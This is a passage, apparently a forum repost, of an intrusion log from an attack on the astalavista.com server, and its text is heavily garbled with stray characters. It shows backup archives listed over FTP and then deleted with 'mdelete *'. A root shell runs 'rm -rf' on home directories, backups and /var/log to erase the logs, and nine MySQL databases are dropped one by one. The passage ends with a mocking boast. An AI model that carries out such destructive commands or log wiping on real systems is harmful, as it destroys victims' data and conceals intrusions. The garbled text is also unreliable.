$ v+ m8 B! C, ]! B l-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
3 a; ~9 n( |& @: y9 b. A-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2# |, ~) L$ W/ @7 O' K/ ^
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
2 S/ r7 K" c, Z1 X: B-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar/ o% t" {$ H" }
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
0 k, ~+ e) v& }[snip]
! S# I- [$ y1 j! Y L226 Transfer complete.
" E. ^; B( s# ?3 u4 fftp> mdelete *7 u; p1 @ ^+ Y# H2 U9 E
ftp> ls -la
& N8 |8 i8 W U: L9 Q227 Entering Passive Mode (212,254,194,163,2,193). }) I, X; i# E* W
150 Opening BINARY mode data connection for ‘file list’.
4 j% W6 ?( Z+ M) q# \226 Transfer complete." R9 E8 O: y: h* `! s/ u% f$ e2 U
ftp>
% Q' N+ b8 _ l5 y- A: `" e& ^" `% ^* U
0 E5 A# A3 h m2 b, R; Csh-3.2# cd /home9 t4 p `* t& w- _5 X& @
sh-3.2# ls -la: i( T9 w$ G5 a' n
total 120& `6 i$ G& R9 b5 I5 L: a# l# F* v
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
/ N0 @- O- F, J5 B* @3 xdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
: k( P# i/ y/ D) } B' T6 ddrwx–x–x 9 admin admin 4096 Nov 28 2007 admin5 I7 L: _5 o5 F
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
5 k6 _8 B2 w* x, T/ p! n-rw——- 1 root root 8192 Jun 3 02:45 aquota.user# ], ^$ S, D H6 w* R) ^7 H
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet) v* l- [2 A# v$ F) h( J! G4 T% ~' {
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup2 Z, {0 u1 U, N/ Q/ o
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
5 N- g5 ` F" e$ V5 h8 v, ndrwx–x–x 10 com com 4096 Apr 28 12:40 com
* ~1 S- E" M* L2 ? t* ydrwxr-xr-x 2 root root 4096 May 17 2007 ftp' _" k y: g7 p( R
drwx—— 3 jon jon 4096 Sep 21 2007 jon
( v8 a7 {4 m/ M3 v0 n* e3 D% Cdrwx—— 2 root root 16384 Sep 11 2007 lost+found
* d) M+ E4 W ]$ Y% rdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
v$ P- }/ M1 V# c- e/ Zdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
! S& X2 n( B! i6 Q4 V4 t. q2 F e; @0 F) Kdrwx—— 2 jon jon 4096 Sep 15 2007 test
- j' @3 d3 n9 U' s" _, B; I4 Y7 T, mdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
+ Y7 ] H: v6 j/ w; j
, D: i# W+ y0 S6 V5 f0 |9 `: dsh-3.2# rm -rf backup/
; L" I( I; R* T! j4 n5 d! W3 `$ xsh-3.2# rm -rf backup.14161/. N6 q2 ^; A0 z g
sh-3.2# rm -rf ftp/* T0 S5 I+ v9 L! m9 k3 w
sh-3.2# rm -rf jon/
/ h* c7 {6 L5 r8 g, h! bsh-3.2# rm -rf my/
, c5 T* a/ c% X1 G! @+ Ash-3.2# rm -rf mysqldata/
- _* @. U" h+ Y4 lsh-3.2# rm -rf test/' T0 c2 E" Z* |5 \
sh-3.2# rm -rf tmp/9 Z' r+ h8 Y8 z% R, C" q
sh-3.2# cd ~5 @5 d5 A5 d# z7 ^4 @2 e
sh-3.2# rm -rf *& T2 j) z5 I# m0 S5 {8 j0 E7 A$ N' r( q
sh-3.2# rm -rf /var/log/4 U1 R% B' t/ {. z
rm: cannot remove directory `/var/log//proftpd’: Directory not empty' k2 i2 z7 t; D# h- ^9 H/ F
sh-3.2# rm -rf /home/*
6 a# W# w0 R# Q; p: p6 H3 v0 g% fsh-3.2# mysql6 \, i, J$ Z3 ]* n
Welcome to the MySQL monitor. Commands end with ; or \g./ E" \3 T# n) k* { Q. i
Your MySQL connection id is 407156
* `; e+ t$ m# H0 dServer version: 5.0.45-community-log MySQL Community Edition (GPL)
# h# [: M) _$ i1 M" b3 C+ p) }% r9 T/ s; p: L
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.6 Y* f H/ J- ~
( j2 i5 }4 [9 m3 |) d( J$ h" z
mysql> show databases;3 O+ h& Q5 h' K8 h- f# T0 }5 @
+———————–+0 Z( y: y" K, ~$ Z4 Y* D; c3 l- o
| Database |4 f: b7 E5 l8 @) Y& W( s8 [
+———————–+2 e% ]& C! G' M7 {
| information_schema |# S0 i, J# [& y v( ^+ _
| astanet_ads |( O. V2 \8 [" _) q! B' ~
| astanet_mailing_lists |
. k( Z" Q; R; u) }, t9 N| astanet_mediawiki |
5 L0 r, L( K! }: M| astanet_membersystem |
# F" U$ O/ o- X3 I| com_contrexx |9 v6 G7 P$ @8 S, [* K
| com_contrexx2 |2 B& c5 S. {3 O' n3 a9 i/ S& C! T$ O
| com_contrexx2_live |8 s5 K! |8 L( r( e5 o A Z
| da_roundcube |
6 _- h! ^1 V7 z2 q4 e M* V5 k, v| dolphin |2 T" X2 [" Z ], d8 |5 x
| ideapool |
6 _* N% z/ `( C) v+ R| mysql |; W" s5 }- a- S0 ]( k# y% D
| test |
- L$ O5 G* s# a. f* C7 K| yourmaster |) \0 ]' R0 } ~$ X: V
+———————–+
' F' ^. ]5 c2 ]14 rows in set (0.03 sec)
# ?+ _$ X" X) T' b
7 a6 ^: y) b Q* M/ u! ?! @& a3 G/ Imysql> drop database astanet_membersystem;7 `. O9 o+ V* l$ E
droQuery OK, 46 rows affected (0.81 sec)
3 `) l. \4 L: w/ q, L+ n2 h2 e5 `) u% m- ]* k3 F
mysql> drop database com_contrexx;' L+ K9 S% x& W- v1 f! }
Query OK, 211 rows affected (2.72 sec)
+ U% E: f9 G, T4 u4 e
0 C9 G# \0 m/ `# \mysql> drop database com_contrexx2;
n5 e1 K6 _5 W$ {" M" u% _& _# fQuery OK, 237 rows affected (2.23 sec)0 R7 S, \* Z+ T, A% q+ P0 N
3 g/ N Y( J5 x: ymysql> drop database com_contrexx2_live;
* |; `% I W8 @$ f" E: ]/ A6 Q9 AQuery OK, 227 rows affected (7.63 sec)% Y# ]- @! x0 w: U" `
+ f# C' k" S, R. V! B9 m0 Zmysql> drop database ideapool;/ e' I; R N! `; {1 i( y- Y
Query OK, 69 rows affected (0.19 sec)
3 S: L/ r2 {4 L* Q) W9 ?& F) M3 t- Z: k! B+ T& o9 s+ Y4 q7 w) G+ c
mysql> drop database yourmaster;
" t! N# x c8 ^, A% {Query OK, 158 rows affected (0.55 sec)0 y/ w" B. {/ v, j/ K
$ f4 U) l8 V; ]( N. d4 d
mysql> drop database astanet_ads;
$ M# A" w) f$ _: KQuery OK, 9 rows affected (0.11 sec)
6 ^: [: B3 J3 c; T
$ U! B9 Z7 K8 _. K! K/ tmysql> drop database astanet_mailing_lists;! H" g& t f. d, D+ ?, ^
Query OK, 24 rows affected (1.47 sec)7 W Y5 B, X! ^% x- u
: j, D+ \9 n* z& W8 K$ _) B
mysql> drop database astanet_mediawiki;! @- C* g% R: N9 k9 \! k( b% G0 Z% T
Query OK, 31 rows affected (0.51 sec)
' t" _! A% @( s; S' q9 _. O' u% q) n; {# U* H' o' A
mysql> show databases;
5 R- z* e" [2 s7 F C$ A+——————–+8 w3 b2 }6 l1 f5 b4 K* N2 y
| Database |
p$ V* m* j0 H5 p' |7 P4 c+——————–+$ p6 I! _$ m5 l; X: e: M+ m$ f
| information_schema |
6 q4 e' m: I1 z| da_roundcube |* a* u' b5 R' {
| dolphin |
* W/ g) x) I% }7 n, B5 u| mysql |
- Z, p& r6 ?, f6 D- ]+ F d| test |, e5 M+ ^/ W/ T& A2 u( `; T, ~4 V
+——————–+ v7 o2 C7 _* w% U1 u% D/ R
5 rows in set (0.00 sec)
) ]) O6 t0 `9 T9 K, C6 c$ a8 z
3 U/ h( w. e+ dWhat a journey! We’re not sure exactly why the “Terminator” had any influence on v' B3 X* O9 t8 R+ e; t
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the% \: e$ M/ B% \. D$ T
wrong to say this pack of morons *wont be back*.# \1 t; l$ R- x; g9 D5 Z" k
|
发表于 2012-11-6 21:07:34
收藏
支持
反对